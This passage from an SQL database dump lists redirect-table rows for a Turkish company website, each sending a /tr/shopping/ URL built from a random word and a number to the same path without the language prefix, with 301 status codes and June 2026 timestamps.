00:00:00',301),(78218,'https://3s-technologies.com.tr/tr/shopping/conversationism/3214445249.html',NULL,'https://3s-technologies.com.tr/shopping/conversationism/3214445249.html','',1,0,'2026-06-11 10:55:06','0000-00-00 00:00:00',301),(78219,'https://3s-technologies.com.tr/tr/shopping/pallipes/2188256362.html',NULL,'https://3s-technologies.com.tr/shopping/pallipes/2188256362.html','',1,0,'2026-06-11 10:55:09','0000-00-00 00:00:00',301),(78220,'https://3s-technologies.com.tr/tr/shopping/sumph/929619596.html',NULL,'https://3s-technologies.com.tr/shopping/sumph/929619596.html','',1,0,'2026-06-11 10:55:12','0000-00-00 00:00:00',301),(78221,'https://3s-technologies.com.tr/tr/shopping/infiltration/1207169794.html',NULL,'https://3s-technologies.com.tr/shopping/infiltration/1207169794.html','',1,0,'2026-06-11 10:55:15','0000-00-00 00:00:00',301),(78222,'https://3s-technologies.com.tr/tr/shopping/caucasus/776279728.html',NULL,'https://3s-technologies.com.tr/shopping/caucasus/776279728.html','',1,0,'2026-06-11 10:55:18','0000-00-00 00:00:00',301),(78223,'https://3s-technologies.com.tr/tr/shopping/impassively/3629549897.html',NULL,'https://3s-technologies.com.tr/shopping/impassively/3629549897.html','',1,0,'2026-06-11 10:55:21','0000-00-00 00:00:00',301),(78224,'https://3s-technologies.com.tr/tr/shopping/supercargo/2795244463.html',NULL,'https://3s-technologies.com.tr/shopping/supercargo/2795244463.html','',1,0,'2026-06-11 10:55:24','0000-00-00 00:00:00',301),(78225,'https://3s-technologies.com.tr/tr/shopping/handwinged/2672885562.html',NULL,'https://3s-technologies.com.tr/shopping/handwinged/2672885562.html','',1,0,'2026-06-11 10:55:27','0000-00-00 00:00:00',301),(78226,'https://3s-technologies.com.tr/tr/shopping/earwax/1852585402.html',NULL,'https://3s-technologies.com.tr/shopping/earwax/1852585402.html','',1,0,'2026-06-11 10:55:30','0000-00-00 00:00:00',301),(78227,'https://3s-technologies.com.tr/tr/shopping/valgus/1137660469.html',NULL,'https://3s-technologies.com.tr/shopping/valgus/1137660469.html','',1,0,'2026-06-11 10:55:33','0000-00-00 00:00:00',301),(78228,'https://3s-technologies.com.tr/tr/shopping/owllight/4116818126.html',NULL,'https://3s-technologies.com.tr/shopping/owllight/4116818126.html','',1,0,'2026-06-11 10:55:36','0000-00-00 00:00:00',301),(78229,'https://3s-technologies.com.tr/tr/shopping/flowerage/1369816850.html',NULL,'https://3s-technologies.com.tr/shopping/flowerage/1369816850.html','',1,0,'2026-06-11 10:55:39','0000-00-00 00:00:00',301),(78230,'https://3s-technologies.com.tr/tr/shopping/resuscitator/209536260.html',NULL,'https://3s-technologies.com.tr/shopping/resuscitator/209536260.html','',1,0,'2026-06-11 10:55:42','0000-00-00 00:00:00',301),(78231,'https://3s-technologies.com.tr/tr/shopping/icicle/190412651.html',NULL,'https://3s-technologies.com.tr/shopping/icicle/190412651.html','',1,0,'2026-06-11 10:55:47','0000-00-00 00:00:00',301),(78232,'https://3s-technologies.com.tr/tr/shopping/acockbill/714012318.html',NULL,'https://3s-technologies.com.tr/shopping/acockbill/714012318.html','',1,0,'2026-06-11 10:55:50','0000-00-00 00:00:00',301),(78233,'https://3s-technologies.com.tr/tr/shopping/bolye/4055762815.html',NULL,'https://3s-technologies.com.tr/shopping/bolye/4055762815.html','',1,0,'2026-06-11 10:55:53','0000-00-00 00:00:00',301),(78234,'https://3s-technologies.com.tr/tr/shopping/superscribing/2949777232.html',NULL,'https://3s-technologies.com.tr/shopping/superscribing/2949777232.html','',1,0,'2026-06-11 10:55:56','0000-00-00 00:00:00',301),(78235,'https://3s-technologies.com.tr/tr/shopping/assaulted/3172213274.html',NULL,'https://3s-technologies.com.tr/shopping/assaulted/3172213274.html','',1,0,'2026-06-11 10:55:59','0000-00-00 00:00:00',301),(78236,'https://3s-technologies.com.tr/tr/shopping/enfect/3289266293.html',NULL,'https://3s-technologies.com.tr/shopping/enfect/3289266293.html','',1,0,'2026-06-11 10:56:02','0000-00-00 00:00:00',301),(78237,'https://3s-technologies.com.tr/tr/shopping/umbellar/1155433213.html',NULL,'https://3s-technologies.com.tr/shopping/umbellar/1155433213.html','',1,0,'2026-06-11 10:56:05','0000-00-00 00:00:00',301),(78238,'https://3s-technologies.com.tr/tr/shopping/batrachoid/485355499.html',NULL,'https://3s-technologies.com.tr/shopping/batrachoid/485355499.html','',1,0,'2026-06-11 10:56:08','0000-00-00 00:00:00',301),(78239,'https://3s-technologies.com.tr/tr/shopping/furlong/3472854023.html',NULL,'https://3s-technologies.com.tr/shopping/furlong/3472854023.html','',1,0,'2026-06-11 10:56:11','0000-00-00 00:00:00',301),(78240,'https://3s-technologies.com.tr/tr/shopping/bailment/3783918289.html',NULL,'https://3s-technologies.com.tr/shopping/bailment/3783918289.html','',1,0,'2026-06-11 10:56:14','0000-00-00 00:00:00',301),(78241,'https://3s-technologies.com.tr/tr/shopping/opinionately/2369103877.html',NULL,'https://3s-technologies.com.tr/shopping/opinionately/2369103877.html','',1,0,'2026-06-11 10:56:19','0000-00-00 00:00:00',301),(78242,'https://3s-technologies.com.tr/tr/shopping/cryptogamist/2152225543.html',NULL,'https://3s-technologies.com.tr/shopping/cryptogamist/2152225543.html','',1,0,'2026-06-11 10:56:21','0000-00-00 00:00:00',301),(78243,'https://3s-technologies.com.tr/tr/shopping/abacination/2061868678.html',NULL,'https://3s-technologies.com.tr/shopping/abacination/2061868678.html','',1,0,'2026-06-11 10:56:24','0000-00-00 00:00:00',301),(78244,'https://3s-technologies.com.tr/tr/shopping/chimaera/154006364.html',NULL,'https://3s-technologies.com.tr/shopping/chimaera/154006364.html','',1,0,'2026-06-11 10:56:27','0000-00-00 00:00:00',301),(78245,'https://3s-technologies.com.tr/tr/shopping/setipennis/334411420.html',NULL,'https://3s-technologies.com.tr/shopping/setipennis/334411420.html','',1,0,'2026-06-11 10:56:30','0000-00-00 00:00:00',301),(78246,'https://3s-technologies.com.tr/tr/shopping/trajectories/4024870807.html',NULL,'https://3s-technologies.com.tr/shopping/trajectories/4024870807.html','',1,0,'2026-06-11 10:56:33','0000-00-00 00:00:00',301),(78247,'https://3s-technologies.com.tr/tr/shopping/exuviae/4267618751.html',NULL,'https://3s-technologies.com.tr/shopping/exuviae/4267618751.html','',1,0,'2026-06-11 10:56:36','0000-00-00 00:00:00',301),(78248,'https://3s-technologies.com.tr/tr/shopping/staithman/3463880651.html',NULL,'https://3s-technologies.com.tr/shopping/staithman/3463880651.html','',1,0,'2026-06-11 10:56:39','0000-00-00 00:00:00',301),(78249,'https://3s-technologies.com.tr/tr/shopping/coloured/2787698859.html',NULL,'https://3s-technologies.com.tr/shopping/coloured/2787698859.html','',1,0,'2026-06-11 10:56:42','0000-00-00 00:00:00',301),(78250,'https://3s-technologies.com.tr/tr/shopping/pernio/3485749946.html',NULL,'https://3s-technologies.com.tr/shopping/pernio/3485749946.html','',1,0,'2026-06-11 10:56:45','0000-00-00 00:00:00',301),(78251,'https://3s-technologies.com.tr/tr/shopping/micher/1232260883.html',NULL,'https://3s-technologies.com.tr/shopping/micher/1232260883.html','',1,0,'2026-06-11 10:56:48','0000-00-00 00:00:00',301),(78252,'https://3s-technologies.com.tr/tr/shopping/domain/1509226831.html',NULL,'https://3s-technologies.com.tr/shopping/domain/1509226831.html','',1,0,'2026-06-11 10:56:51','0000-00-00 00:00:00',301),(78253,'https://3s-technologies.com.tr/tr/shopping/transmutual/1313884430.html',NULL,'https://3s-technologies.com.tr/shopping/transmutual/1313884430.html','',1,0,'2026-06-11 10:56:54','0000-00-00 00:00:00',301),(78254,'https://3s-technologies.com.tr/tr/shopping/superintellectual/3102852892.html',NULL,'https://3s-technologies.com.tr/shopping/superintellectual/3102852892.html','',1,0,'2026-06-11 10:56:57','0000-00-00 00:00:00',301),(78255,'https://3s-technologies.com.tr/tr/shopping/totteringly/3954572546.html',NULL,'https://3s-technologies.com.tr/shopping/totteringly/3954572546.html','',1,0,'2026-06-11 10:57:00','0000-00-00 00:00:00',301),(78256,'https://3s-technologies.com.tr/tr/shopping/reebok/3396959047.html',NULL,'https://3s-technologies.com.tr/shopping/reebok/3396959047.html','',1,0,'2026-06-11 10:57:08','0000-00-00 00:00:00',301),(78257,'https://3s-technologies.com.tr/tr/shopping/sheepfold/3857432990.html',NULL,'https://3s-technologies.com.tr/shopping/sheepfold/3857432990.html','',1,0,'2026-06-11 10:57:10','0000-00-00 00:00:00',301),(78258,'https://3s-technologies.com.tr/tr/shopping/prefacer/360845750.html',NULL,'https://3s-technologies.com.tr/shopping/prefacer/360845750.html','',1,0,'2026-06-11 10:57:13','0000-00-00 00:00:00',301),(78259,'https://3s-technologies.com.tr/tr/shopping/participating/2711766886.html',NULL,'https://3s-technologies.com.tr/shopping/participating/2711766886.html','',1,0,'2026-06-11 10:57:16','0000-00-00 00:00:00',301),(78260,'https://3s-technologies.com.tr/tr/shopping/pilea/3480628556.html',NULL,'https://3s-technologies.com.tr/shopping/pilea/3480628556.html','',1,0,'2026-06-11 10:57:19','0000-00-00 00:00:00',301),(78261,'https://3s-technologies.com.tr/tr/shopping/visored/252366227.html',NULL,'https://3s-technologies.com.tr/shopping/visored/252366227.html','',1,0,'2026-06-11 10:57:22','0000-00-00 00:00:00',301),(78262,'https://3s-technologies.com.tr/tr/shopping/eelpot/1075519617.html',NULL,'https://3s-technologies.com.tr/shopping/eelpot/1075519617.html','',1,0,'2026-06-11 10:57:25','0000-00-00 00:00:00',301),(78263,'https://3s-technologies.com.tr/tr/shopping/futile/1317070159.html',NULL,'https://3s-technologies.com.tr/shopping/futile/1317070159.html','',1,0,'2026-06-11 10:57:28','0000-00-00 00:00:00',301),(78264,'https://3s-technologies.com.tr/tr/shopping/arizonan/3092136171.html',NULL,'https://3s-technologies.com.tr/shopping/arizonan/3092136171.html','',1,0,'2026-06-11 10:57:31','0000-00-00 00:00:00',301),(78265,'https://3s-technologies.com.tr/tr/shopping/falconidae/309698022.html',NULL,'https://3s-technologies.com.tr/shopping/falconidae/309698022.html','',1,0,'2026-06-11 10:57:34','0000-00-00 00:00:00',301),(78266,'https://3s-technologies.com.tr/tr/shopping/mishna/1098016231.html',NULL,'https://3s-technologies.com.tr/shopping/mishna/1098016231.html','',1,0,'2026-06-11 10:57:37','0000-00-00 00:00:00',301),(78267,'https://3s-technologies.com.tr/tr/shopping/inhold/759973250.html',NULL,'https://3s-technologies.com.tr/shopping/inhold/759973250.html','',1,0,'2026-06-11 10:57:40','0000-00-00 00:00:00',301),(78268,'https://3s-technologies.com.tr/tr/shopping/scoundreldom/218891971.html',NULL,'https://3s-technologies.com.tr/shopping/scoundreldom/218891971.html','',1,0,'2026-06-11 10:57:43','0000-00-00 00:00:00',301),(78269,'https://3s-technologies.com.tr/tr/shopping/astrophyton/416388905.html',NULL,'https://3s-technologies.com.tr/shopping/astrophyton/416388905.html','',1,0,'2026-06-11 10:57:46','0000-00-00 00:00:00',301),(78270,'https://3s-technologies.com.tr/tr/shopping/sheldfowl/1969095808.html',NULL,'https://3s-technologies.com.tr/shopping/sheldfowl/1969095808.html','',1,0,'2026-06-11 10:57:49','0000-00-00 00:00:00',301),(78271,'https://3s-technologies.com.tr/tr/shopping/carpeting/3929066922.html',NULL,'https://3s-technologies.com.tr/shopping/carpeting/3929066922.html','',1,0,'2026-06-11 10:58:04','0000-00-00 00:00:00',301),(78272,'https://3s-technologies.com.tr/tr/shopping/pigjawed/3795302788.html',NULL,'https://3s-technologies.com.tr/shopping/pigjawed/3795302788.html','',1,0,'2026-06-11 10:58:07','0000-00-00 00:00:00',301),(78273,'https://3s-technologies.com.tr/tr/shopping/pedestrian/1184037590.html',NULL,'https://3s-technologies.com.tr/shopping/pedestrian/1184037590.html','',1,0,'2026-06-11 10:58:10','0000-00-00 00:00:00',301),(78274,'https://3s-technologies.com.tr/tr/shopping/sweetsop/3163226674.html',NULL,'https://3s-technologies.com.tr/shopping/sweetsop/3163226674.html','',1,0,'2026-06-11 10:58:13','0000-00-00 00:00:00',301),(78275,'https://3s-technologies.com.tr/tr/shopping/fraenulum/2027595763.html',NULL,'https://3s-technologies.com.tr/shopping/fraenulum/2027595763.html','',1,0,'2026-06-11 10:58:16','0000-00-00 00:00:00',301),(78276,'https://3s-technologies.com.tr/tr/shopping/missae/1427018115.html',NULL,'https://3s-technologies.com.tr/shopping/missae/1427018115.html','',1,0,'2026-06-11 10:58:19','0000-00-00 00:00:00',301),(78277,'https://3s-technologies.com.tr/tr/shopping/malingering/925511326.html',NULL,'https://3s-technologies.com.tr/shopping/malingering/925511326.html','',1,0,'2026-06-11 10:58:22','0000-00-00 00:00:00',301),(78278,'https://3s-technologies.com.tr/tr/shopping/whinnied/197329552.html',NULL,'https://3s-technologies.com.tr/shopping/whinnied/197329552.html','',1,0,'2026-06-11 10:58:25','0000-00-00 00:00:00',301),(78279,'https://3s-technologies.com.tr/tr/shopping/sententiously/1835495197.html',NULL,'https://3s-technologies.com.tr/shopping/sententiously/1835495197.html','',1,0,'2026-06-11 10:58:28','0000-00-00 00:00:00',301),(78280,'https://3s-technologies.com.tr/tr/shopping/fissural/3053543535.html',NULL,'https://3s-technologies.com.tr/shopping/fissural/3053543535.html','',1,0,'2026-06-11 10:58:31','0000-00-00 00:00:00',301),(78281,'https://3s-technologies.com.tr/tr/shopping/sithed/3231685820.html',NULL,'https://3s-technologies.com.tr/shopping/sithed/3231685820.html','',1,0,'2026-06-11 10:58:34','0000-00-00 00:00:00',301),(78282,'https://3s-technologies.com.tr/tr/shopping/birching/3694241521.html',NULL,'https://3s-technologies.com.tr/shopping/birching/3694241521.html','',1,0,'2026-06-11 10:58:37','0000-00-00 00:00:00',301),(78283,'https://3s-technologies.com.tr/tr/shopping/paleolithic/1953140129.html',NULL,'https://3s-technologies.com.tr/shopping/paleolithic/1953140129.html','',1,0,'2026-06-11 10:58:40','0000-00-00 00:00:00',301),(78284,'https://3s-technologies.com.tr/tr/shopping/xanthophyll/3630900794.html',NULL,'https://3s-technologies.com.tr/shopping/xanthophyll/3630900794.html','',1,0,'2026-06-11 10:58:43','0000-00-00 00:00:00',301),(78285,'https://3s-technologies.com.tr/tr/shopping/floorer/2525130912.html',NULL,'https://3s-technologies.com.tr/shopping/floorer/2525130912.html','',1,0,'2026-06-11 10:58:46','0000-00-00 00:00:00',301),(78286,'https://3s-technologies.com.tr/tr/shopping/gazehound/1149034318.html',NULL,'https://3s-technologies.com.tr/shopping/gazehound/1149034318.html','',1,0,'2026-06-11 10:58:49','0000-00-00 00:00:00',301),(78287,'https://3s-technologies.com.tr/tr/shopping/cryptology/2320653373.html',NULL,'https://3s-technologies.com.tr/shopping/cryptology/2320653373.html','',1,0,'2026-06-11 10:58:52','0000-00-00 00:00:00',301),(78288,'https://3s-technologies.com.tr/tr/shopping/alloy/1901341329.html',NULL,'https://3s-technologies.com.tr/shopping/alloy/1901341329.html','',1,0,'2026-06-11 10:58:55','0000-00-00 00:00:00',301),(78289,'https://3s-technologies.com.tr/tr/shopping/antipharmic/2060270938.html',NULL,'https://3s-technologies.com.tr/shopping/antipharmic/2060270938.html','',1,0,'2026-06-11 10:58:58','0000-00-00 00:00:00',301),(78290,'https://3s-technologies.com.tr/tr/shopping/sough/2104650676.html',NULL,'https://3s-technologies.com.tr/shopping/sough/2104650676.html','',1,0,'2026-06-11 10:59:01','0000-00-00 00:00:00',301),(78291,'https://3s-technologies.com.tr/tr/shopping/skulking/51999084.html',NULL,'https://3s-technologies.com.tr/shopping/skulking/51999084.html','',1,0,'2026-06-11 10:59:04','0000-00-00 00:00:00',301),(78292,'https://3s-technologies.com.tr/tr/shopping/quadricostate/3936612542.html',NULL,'https://3s-technologies.com.tr/shopping/quadricostate/3936612542.html','',1,0,'2026-06-11 10:59:07','0000-00-00 00:00:00',301),(78293,'https://3s-technologies.com.tr/tr/shopping/plenipotentiary/1448705607.html',NULL,'https://3s-technologies.com.tr/shopping/plenipotentiary/1448705607.html','',1,0,'2026-06-11 10:59:10','0000-00-00 00:00:00',301),(78294,'https://3s-technologies.com.tr/tr/shopping/jostle/411420925.html',NULL,'https://3s-technologies.com.tr/shopping/jostle/411420925.html','',1,0,'2026-06-11 10:59:13','0000-00-00 00:00:00',301),(78295,'https://3s-technologies.com.tr/tr/shopping/pertinate/12789315.html',NULL,'https://3s-technologies.com.tr/shopping/pertinate/12789315.html','',1,0,'2026-06-11 10:59:16','0000-00-00 00:00:00',301),(78296,'https://3s-technologies.com.tr/tr/shopping/luxuriate/196377045.html',NULL,'https://3s-technologies.com.tr/shopping/luxuriate/196377045.html','',1,0,'2026-06-11 10:59:19','0000-00-00 00:00:00',301),(78297,'https://3s-technologies.com.tr/tr/shopping/chauffeuse/2980808006.html',NULL,'https://3s-technologies.com.tr/shopping/chauffeuse/2980808006.html','',1,0,'2026-06-11 10:59:22','0000-00-00 00:00:00',301),(78298,'https://3s-technologies.com.tr/tr/shopping/slippery/2868747606.html',NULL,'https://3s-technologies.com.tr/shopping/slippery/2868747606.html','',1,0,'2026-06-11 10:59:25','0000-00-00 00:00:00',301),(78299,'https://3s-technologies.com.tr/tr/shopping/mopus/2664377354.html',NULL,'https://3s-technologies.com.tr/shopping/mopus/2664377354.html','',1,0,'2026-06-11 10:59:28','0000-00-00 00:00:00',301),(78300,'https://3s-technologies.com.tr/tr/shopping/illomened/987111640.html',NULL,'https://3s-technologies.com.tr/shopping/illomened/987111640.html','',1,0,'2026-06-11 10:59:31','0000-00-00 00:00:00',301),(78301,'https://3s-technologies.com.tr/tr/shopping/hagdon/761613689.html',NULL,'https://3s-technologies.com.tr/shopping/hagdon/761613689.html','',1,0,'2026-06-11 10:59:34','0000-00-00 00:00:00',301),(78302,'https://3s-technologies.com.tr/tr/shopping/freshness/1191050592.html',NULL,'https://3s-technologies.com.tr/shopping/freshness/1191050592.html','',1,0,'2026-06-11 10:59:37','0000-00-00 00:00:00',301),(78303,'https://3s-technologies.com.tr/tr/shopping/oxysulphide/3850774471.html',NULL,'https://3s-technologies.com.tr/shopping/oxysulphide/3850774471.html','',1,0,'2026-06-11 10:59:40','0000-00-00 00:00:00',301),(78304,'https://3s-technologies.com.tr/tr/shopping/amphicarpic/1729707641.html',NULL,'https://3s-technologies.com.tr/shopping/amphicarpic/1729707641.html','',1,0,'2026-06-11 10:59:43','0000-00-00 00:00:00',301),(78305,'https://3s-technologies.com.tr/tr/shopping/egritude/3605670907.html',NULL,'https://3s-technologies.com.tr/shopping/egritude/3605670907.html','',1,0,'2026-06-11 10:59:46','0000-00-00 00:00:00',301),(78306,'https://3s-technologies.com.tr/tr/shopping/replenishing/4210837343.html',NULL,'https://3s-technologies.com.tr/shopping/replenishing/4210837343.html','',1,0,'2026-06-11 10:59:49','0000-00-00 00:00:00',301),(78307,'https://3s-technologies.com.tr/tr/shopping/violate/1945781785.html',NULL,'https://3s-technologies.com.tr/shopping/violate/1945781785.html','',1,0,'2026-06-11 10:59:52','0000-00-00 00:00:00',301),(78308,'https://3s-technologies.com.tr/tr/shopping/forlye/4116654603.html',NULL,'https://3s-technologies.com.tr/shopping/forlye/4116654603.html','',1,0,'2026-06-11 10:59:55','0000-00-00 00:00:00',301),(78309,'https://3s-technologies.com.tr/tr/shopping/namyl/4080258922.html',NULL,'https://3s-technologies.com.tr/shopping/namyl/4080258922.html','',1,0,'2026-06-11 11:00:03','0000-00-00 00:00:00',301),(78310,'https://3s-technologies.com.tr/tr/shopping/detersiveness/2607241463.html',NULL,'https://3s-technologies.com.tr/shopping/detersiveness/2607241463.html','',1,0,'2026-06-11 11:00:05','0000-00-00 00:00:00',301),(78311,'https://3s-technologies.com.tr/tr/shopping/daughterly/898591005.html',NULL,'https://3s-technologies.com.tr/shopping/daughterly/898591005.html','',1,0,'2026-06-11 11:00:08','0000-00-00 00:00:00',301),(78312,'https://3s-technologies.com.tr/tr/shopping/ingeneration/3635653121.html',NULL,'https://3s-technologies.com.tr/shopping/ingeneration/3635653121.html','',1,0,'2026-06-11 11:00:11','0000-00-00 00:00:00',301),(78313,'https://3s-technologies.com.tr/tr/shopping/dirempt/923087112.html',NULL,'https://3s-technologies.com.tr/shopping/dirempt/923087112.html','',1,0,'2026-06-11 11:00:14','0000-00-00 00:00:00',301),(78314,'https://3s-technologies.com.tr/tr/shopping/duplicature/973662287.html',NULL,'https://3s-technologies.com.tr/shopping/duplicature/973662287.html','',1,0,'2026-06-11 11:00:17','0000-00-00 00:00:00',301),(78315,'https://3s-technologies.com.tr/tr/shopping/surmountableness/2524443238.html',NULL,'https://3s-technologies.com.tr/shopping/surmountableness/2524443238.html','',1,0,'2026-06-11 11:00:20','0000-00-00 00:00:00',301),(78316,'https://3s-technologies.com.tr/tr/shopping/scise/2267121382.html',NULL,'https://3s-technologies.com.tr/shopping/scise/2267121382.html','',1,0,'2026-06-11 11:00:23','0000-00-00 00:00:00',301),(78317,'https://3s-technologies.com.tr/tr/shopping/veneris/1087299510.html',NULL,'https://3s-technologies.com.tr/shopping/veneris/1087299510.html','',1,0,'2026-06-11 11:00:26','0000-00-00 00:00:00',301),(78318,'https://3s-technologies.com.tr/tr/shopping/mercat/1083432916.html',NULL,'https://3s-technologies.com.tr/shopping/mercat/1083432916.html','',1,0,'2026-06-11 11:00:29','0000-00-00 00:00:00',301),(78319,'https://3s-technologies.com.tr/tr/shopping/hautboy/2663544479.html',NULL,'https://3s-technologies.com.tr/shopping/hautboy/2663544479.html','',1,0,'2026-06-11 11:00:36','0000-00-00 00:00:00',301),(78320,'https://3s-technologies.com.tr/tr/shopping/coronilla/2629537589.html',NULL,'https://3s-technologies.com.tr/shopping/coronilla/2629537589.html','',1,0,'2026-06-11 11:00:38','0000-00-00 00:00:00',301),(78321,'https://3s-technologies.com.tr/tr/shopping/oblivious/2743229962.html',NULL,'https://3s-technologies.com.tr/shopping/oblivious/2743229962.html','',1,0,'2026-06-11 11:00:41','0000-00-00 00:00:00',301),(78322,'https://3s-technologies.com.tr/tr/shopping/pilour/26135822.html',NULL,'https://3s-technologies.com.tr/shopping/pilour/26135822.html','',1,0,'2026-06-11 11:00:44','0000-00-00 00:00:00',301),(78323,'https://3s-technologies.com.tr/tr/shopping/cuppy/484935610.html',NULL,'https://3s-technologies.com.tr/shopping/cuppy/484935610.html','',1,0,'2026-06-11 11:00:47','0000-00-00 00:00:00',301),(78324,'https://3s-technologies.com.tr/tr/shopping/odontiasis/3358319462.html',NULL,'https://3s-technologies.com.tr/shopping/odontiasis/3358319462.html','',1,0,'2026-06-11 11:00:50','0000-00-00 00:00:00',301),(78325,'https://3s-technologies.com.tr/tr/shopping/endosmotic/2662376303.html',NULL,'https://3s-technologies.com.tr/shopping/endosmotic/2662376303.html','',1,0,'2026-06-11 11:00:53','0000-00-00 00:00:00',301),(78326,'https://3s-technologies.com.tr/tr/shopping/susceptivity/266091926.html',NULL,'https://3s-technologies.com.tr/shopping/susceptivity/266091926.html','',1,0,'2026-06-11 11:00:56','0000-00-00 00:00:00',301),(78327,'https://3s-technologies.com.tr/tr/shopping/uncleship/2073367950.html',NULL,'https://3s-technologies.com.tr/shopping/uncleship/2073367950.html','',1,0,'2026-06-11 11:00:59','0000-00-00 00:00:00',301),(78328,'https://3s-technologies.com.tr/tr/shopping/usurp/3624103493.html',NULL,'https://3s-technologies.com.tr/shopping/usurp/3624103493.html','',1,0,'2026-06-11 11:01:02','0000-00-00 00:00:00',301),(78329,'https://3s-technologies.com.tr/tr/shopping/pulmonated/4154082073.html',NULL,'https://3s-technologies.com.tr/shopping/pulmonated/4154082073.html','',1,0,'2026-06-11 11:01:06','0000-00-00 00:00:00',301),(78330,'https://3s-technologies.com.tr/tr/shopping/hepatical/3686503985.html',NULL,'https://3s-technologies.com.tr/shopping/hepatical/3686503985.html','',1,0,'2026-06-11 11:01:08','0000-00-00 00:00:00',301),(78331,'https://3s-technologies.com.tr/tr/shopping/stifle/3225884917.html',NULL,'https://3s-technologies.com.tr/shopping/stifle/3225884917.html','',1,0,'2026-06-11 11:01:11','0000-00-00 00:00:00',301),(78332,'https://3s-technologies.com.tr/tr/shopping/overmeddling/3929695625.html',NULL,'https://3s-technologies.com.tr/shopping/overmeddling/3929695625.html','',1,0,'2026-06-11 11:01:14','0000-00-00 00:00:00',301),(78333,'https://3s-technologies.com.tr/tr/shopping/nidor/2664540893.html',NULL,'https://3s-technologies.com.tr/shopping/nidor/2664540893.html','',1,0,'2026-06-11 11:01:17','0000-00-00 00:00:00',301),(78334,'https://3s-technologies.com.tr/tr/shopping/snare/2450500181.html',NULL,'https://3s-technologies.com.tr/shopping/snare/2450500181.html','',1,0,'2026-06-11 11:01:21','0000-00-00 00:00:00',301),(78335,'https://3s-technologies.com.tr/tr/shopping/heediness/4229975580.html',NULL,'https://3s-technologies.com.tr/shopping/heediness/4229975580.html','',1,0,'2026-06-11 11:01:23','0000-00-00 00:00:00',301),(78336,'https://3s-technologies.com.tr/tr/shopping/bulbosus/3970275543.html',NULL,'https://3s-technologies.com.tr/shopping/bulbosus/3970275543.html','',1,0,'2026-06-11 11:01:26','0000-00-00 00:00:00',301),(78337,'https://3s-technologies.com.tr/tr/shopping/peremptorily/2160132425.html',NULL,'https://3s-technologies.com.tr/shopping/peremptorily/2160132425.html','',1,0,'2026-06-11 11:01:29','0000-00-00 00:00:00',301),(78338,'https://3s-technologies.com.tr/tr/shopping/pulmonifera/1825510041.html',NULL,'https://3s-technologies.com.tr/shopping/pulmonifera/1825510041.html','',1,0,'2026-06-11 11:01:32','0000-00-00 00:00:00',301),(78339,'https://3s-technologies.com.tr/tr/shopping/highhanded/2355312788.html',NULL,'https://3s-technologies.com.tr/shopping/highhanded/2355312788.html','',1,0,'2026-06-11 11:01:35','0000-00-00 00:00:00',301),(78340,'https://3s-technologies.com.tr/tr/shopping/blennioid/3264740203.html',NULL,'https://3s-technologies.com.tr/shopping/blennioid/3264740203.html','',1,0,'2026-06-11 11:01:38','0000-00-00 00:00:00',301),(78341,'https://3s-technologies.com.tr/tr/shopping/nunciate/557291190.html',NULL,'https://3s-technologies.com.tr/shopping/nunciate/557291190.html','',1,0,'2026-06-11 11:01:41','0000-00-00 00:00:00',301),(78342,'https://3s-technologies.com.tr/tr/shopping/pleonastically/1303326661.html',NULL,'https://3s-technologies.com.tr/shopping/pleonastically/1303326661.html','',1,0,'2026-06-11 11:01:44','0000-00-00 00:00:00',301),(78343,'https://3s-technologies.com.tr/tr/shopping/galactodendron/581143272.html',NULL,'https://3s-technologies.com.tr/shopping/galactodendron/581143272.html','',1,0,'2026-06-11 11:01:47','0000-00-00 00:00:00',301),(78344,'https://3s-technologies.com.tr/tr/shopping/limnodromus/3144566845.html',NULL,'https://3s-technologies.com.tr/shopping/limnodromus/3144566845.html','',1,0,'2026-06-11 11:01:50','0000-00-00 00:00:00',301),(78345,'https://3s-technologies.com.tr/tr/shopping/barbadian/2030617985.html',NULL,'https://3s-technologies.com.tr/shopping/barbadian/2030617985.html','',1,0,'2026-06-11 11:01:53','0000-00-00 00:00:00',301),(78346,'https://3s-technologies.com.tr/tr/shopping/tales/98601947.html',NULL,'https://3s-technologies.com.tr/shopping/tales/98601947.html','',1,0,'2026-06-11 11:01:56','0000-00-00 00:00:00',301),(78347,'https://3s-technologies.com.tr/tr/shopping/uprear/232846583.html',NULL,'https://3s-technologies.com.tr/shopping/uprear/232846583.html','',1,0,'2026-06-11 11:01:59','0000-00-00 00:00:00',301),(78348,'https://3s-technologies.com.tr/tr/shopping/retranslate/3532295004.html',NULL,'https://3s-technologies.com.tr/shopping/retranslate/3532295004.html','',1,0,'2026-06-11 11:02:02','0000-00-00 00:00:00',301),(78349,'https://3s-technologies.com.tr/tr/shopping/elbowroom/4176518699.html',NULL,'https://3s-technologies.com.tr/shopping/elbowroom/4176518699.html','',1,0,'2026-06-11 11:02:05','0000-00-00 00:00:00',301),(78350,'https://3s-technologies.com.tr/tr/shopping/rhody/2366818493.html',NULL,'https://3s-technologies.com.tr/shopping/rhody/2366818493.html','',1,0,'2026-06-11 11:02:14','0000-00-00 00:00:00',301),(78351,'https://3s-technologies.com.tr/tr/shopping/starker/3065043999.html',NULL,'https://3s-technologies.com.tr/shopping/starker/3065043999.html','',1,0,'2026-06-11 11:02:16','0000-00-00 00:00:00',301),(78352,'https://3s-technologies.com.tr/tr/shopping/parage/1890039812.html',NULL,'https://3s-technologies.com.tr/shopping/parage/1890039812.html','',1,0,'2026-06-11 11:02:18','0000-00-00 00:00:00',301),(78353,'https://3s-technologies.com.tr/tr/shopping/heroicomic/3328904418.html',NULL,'https://3s-technologies.com.tr/shopping/heroicomic/3328904418.html','',1,0,'2026-06-11 11:02:22','0000-00-00 00:00:00',301),(78354,'https://3s-technologies.com.tr/tr/shopping/lomata/2228102605.html',NULL,'https://3s-technologies.com.tr/shopping/lomata/2228102605.html','',1,0,'2026-06-11 11:02:24','0000-00-00 00:00:00',301),(78355,'https://3s-technologies.com.tr/tr/shopping/twelvepence/3339790775.html',NULL,'https://3s-technologies.com.tr/shopping/twelvepence/3339790775.html','',1,0,'2026-06-11 11:02:28','0000-00-00 00:00:00',301),(78356,'https://3s-technologies.com.tr/tr/shopping/aardvark/2125545942.html',NULL,'https://3s-technologies.com.tr/shopping/aardvark/2125545942.html','',1,0,'2026-06-11 11:02:30','0000-00-00 00:00:00',301),(78357,'https://3s-technologies.com.tr/tr/shopping/ararauna/2342409923.html',NULL,'https://3s-technologies.com.tr/shopping/ararauna/2342409923.html','',1,0,'2026-06-11 11:02:33','0000-00-00 00:00:00',301),(78358,'https://3s-technologies.com.tr/tr/shopping/tastefulness/3315355313.html',NULL,'https://3s-technologies.com.tr/shopping/tastefulness/3315355313.html','',1,0,'2026-06-11 11:02:37','0000-00-00 